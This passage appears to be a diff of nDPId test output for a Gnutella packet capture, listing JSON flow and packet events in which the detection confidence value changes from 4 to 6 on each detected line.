00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168428,"flow_last_seen":168428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168428,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":168428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168428,"pkt":"UlQAEjUCCAAn5uVZCABFAABtVroAAIARN3AKAAIPxjraDHAJuygAWfAoVB4xAiIUq1VNOT5K4PsAnkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168428,"flow_last_seen":168428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168428,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2727,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168428,"flow_last_seen":168428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168428,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168555,"flow_last_seen":168555,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168555,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":168555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168555,"pkt":"UlQAEjUCCAAn5uVZCABFAABtB2EAAIARDDsKAAIPVoHEVHAJJrsAWdbAQsoxAjcNEhOQ8aGFyag54kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168555,"flow_last_seen":168555,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168555,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168555,"flow_last_seen":168555,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168555,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2733,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":2,"flow_last_seen":168593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":168593,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB7wAAEARSVpWgcRUCgACDya7cAkC37LQQsoxAjcNEhOQ8aGFyag54kQAAMACAAAGR1RLRwAAUhNI53eBGeJh0nCkclkfZJnzMvMEVoHEVCa7AQAAAATmnBkoFEdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegkdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj1dTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABK1XVsEZ16ugW6JpsS4xfhpSq81BEjJ0DmW2UdUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAA
yXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEA=="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168594,"flow_last_seen":168594,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168594,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":168594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168594,"pkt":"UlQAEjUCCAAn5uVZCABFAABtbeQAAIARLxYKAAIPvsDStnAJGmIAWe\/nYtExAgjn\/Ke847x2NG4oVEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168594,"flow_last_seen":168594,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168594,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168594,"flow_last_seen":168594,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168594,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168840,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168840,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":168840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168840,"pkt":"UlQAEjUCCAAn5uVZCABFAABteiAAAIARB1cKAAIPUc1bLXAJlZkAWXbGOhUxApJjO\/JuqWKA3F9q70QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168840,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168840,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168840,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168840,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":2,"flow_last_seen":168854,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":168854,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB8MAAEAR0rG+wNK2CgACDxpicAkC32qFYtExAgjn\/Ke847x2NG4oVEQAAMACAAAGR1RLRwAAVhpgfx\/FIwIUkbHoonVeeVgxwBsEvsDSthpiAQAAAAQZ71djFEdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegkdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj1dTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABK1XVsEZ16ugW6JpsS4xfhpSq81BEjJ0DmW2UdUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeQ=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":3,"flow_last_seen":174268,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174268,"pkt":"UlQAEjUCCAAn5uVZCABFAABybeUAAIARLxAKAAIPvsDStnAJGmIAXsbRDJkxAiMikaZOqXdSUPahXUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 
00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":3,"flow_last_seen":174269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174269,"pkt":"UlQAEjUCCAAn5uVZCABFAAByB2IAAIARDDUKAAIPVoHEVHAJJrsAXjsDcFExAhHLtY5GdmAVhlELQEQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174303,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174303,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":174303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174303,"pkt":"UlQAEjUCCAAn5uVZCABFAAByStEAAIARbHkKAAIPwqO0fnAJKkkAXkeElzExAuaUt3SA\/qxG7F60jUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174303,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174303,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174303,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174303,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2807,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":2,"flow_last_seen":174303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174303,"pkt":"UlQAEjUCCAAn5uVZCABFAAByVrsAAIARN2oKAAIPxjraDHAJuygAXpm7NG4xAlN4rvcHLSWuyVzKGkQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2810,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":3,"flow_last_seen":174321,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174321,"pkt":"UlQAEjUCCAAn5uVZCABFAAByxlcAAIARNIMKAAIPjoSlDXAJd2YAXu8TjWExApO4DvtDKbdx2klNVkQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":174322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174322,"pkt":"UlQAEjUCCAAn5uVZCABFAABy\/iwAAIARW1MKAAIPvBcY1XAJSIEAXn4ZciIxAgUt47TCA6DBC1+HrEQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":174322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174322,"pkt":"UlQAEjUCCAAn5uVZCABFAAByI9AAAIARdPYKAAIPXgg3nnAJx8QAXqKieDQxAq3mE0dDpkvWQzLgPUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":2,"flow_last_seen":174323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":174323,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB+sAAEAR7N7Co7R+CgACDypJcAkC36eTlzExAuaUt3SA\/qxG7F60jUQAAMACAAAGR1RLRwAAW5ZMJAC\/sp0EyBIYLqaZItjn8QIEwqO0fipJAQAAAAQkVMV3FEdUS0cAAFxg+taEWAYB1unX7flSWQRG3beNBGic4kjQCldTSFIAAFpCOi4aZIiG9lYEyciBumqkMMTzBMY62gy7KEdUS0cAAFf2jq05FgyfJOGIcRJLg6NdtQ1eBLw9NLcuTEdUS0cAAFYaYH8fxSMCFJGx6KJ1XnlYMcAbBL7A0rYaYkdUS0cAAFFI2BA3K8AVe0IqJAEnw9\/D630lBI6EpQ13ZkdUS0cAAFITSOd3gRniYdJwpHJZH2SZ8zLzBFaBxFQmu0dUS0cAAE3VqZZmQu9JEb4xS9XAL1zJJdrgBLwXGNVIgVdTSFIAAEwNRRSjJbzqx43c9rTKLbxkbHgKBF4IN57HxEdUS0cAAElxJg9dajjzW3txW7a4q7j8IGI0BFHNWy2VmUdUS0cAAEE1vJAZC\/Oid7YdKVGKEGbtSapFBJUco6\/DJFdTSFIAAEJDtkelhifx87ftq707Fzo\/U0PdBC+TNBWPe